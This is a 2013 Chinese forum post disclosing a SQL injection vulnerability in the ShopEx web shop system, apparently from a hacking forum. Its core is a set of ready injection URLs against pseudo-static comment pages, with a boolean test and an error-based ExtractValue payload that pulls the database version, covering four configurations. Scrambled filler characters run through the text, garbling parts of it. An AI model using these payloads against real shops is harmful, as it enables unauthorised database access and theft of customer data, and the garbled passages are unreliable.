注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
: f' V5 D6 N+ L2 z$ A: {6 ?4 V# J0 w# ]& |0 N4 a
好吧,我扯远了~~# ^! }/ _3 V! K% G8 v
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
+ P' A( \+ g; M6 V+ k' l- d$ H不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: 7 P: R7 a% d1 d5 e4 E8 W* m
8 I+ n+ U4 G5 B# _7 d: K
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
' g" J! h- t9 D! a& X2 h; c$ `& j2 i- j7 w* O
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 2 ~2 h* ^* a( d1 A7 h# x
" f) W! ~. y7 X* [% A8 ]6 x
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
/ v; \' v5 _7 V( H* N" }1 j
- B. s4 M, F. L# ohttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
& Z: J5 q- [- h" A% I6 I8 k9 B0 `% i* z5 Y: j( V$ k6 L1 g
) w# b4 g# _2 `- }! x
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
- k. u* \) P4 A) V如何注入就不多说了,10多年的东西了…不会也会了… % r5 \& z( o3 I; w1 F8 i5 O
# D+ {: Y) v" N4 Y: u1 _# C' ^5 ~. `' Q0 Q
3 F7 |) I- b9 B7 p1 a+ k, c, q) L1 D: q
|
发表于 2013-2-19 08:31:27
收藏
支持
反对